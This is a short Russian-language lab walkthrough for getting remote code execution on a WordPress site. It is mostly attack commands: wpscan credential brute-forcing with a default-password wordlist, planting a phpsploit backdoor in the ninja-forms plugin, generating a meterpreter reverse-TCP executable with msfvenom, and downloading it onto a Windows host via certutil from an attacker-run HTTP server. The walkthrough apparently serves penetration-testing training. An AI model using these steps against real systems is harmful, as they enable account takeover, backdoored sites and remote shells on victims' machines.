Получение RCE в лабораторной работе через web-прложение, это просто подход, который можно реплицировать на любую уязвимость вебчика в контексте RCE:
wpscan --url <http://10.152.152.11:8585/wordpress/> --enumerate u -P /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt
Используя полученные учетные данные нужно зайти с правами администратора и добавить бэкдор в плагин, например, в ninja-forms.
phpsploit - запуск фреймворка для удобной эксплуатации
phpsploit > set - получение строки импланта, который можно будет использовать в качестве полезной нагрузки в разделе “Плагины”

phpsploit > set target [<http://10.0.0.101:8585/wordpress/wp-content/plugins/ninja-forms/index.php>](<http://10.0.0.101:8585/wordpress/wp-content/plugins/ninja-forms/index.php>) - нативно выполняем подсказки консоли и указываем директорию с имплантом
phpsploit > exploit - выполняем обратное подключение

msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=10.0.2.X lport=4444 -f exe > reverse_tcp.exe # X - последний октет ip-адреса Kali Linux
Kali: python3 -m http.server 80
C2: run certutil.exe -urlcache -split -f [<http://10.0.0.100:80/reverse_tcp.exe>](<http://10.0.0.100/reverse_tcp.exe>) - загружаем имплант от для получения интерактивное оболочки meterpreter

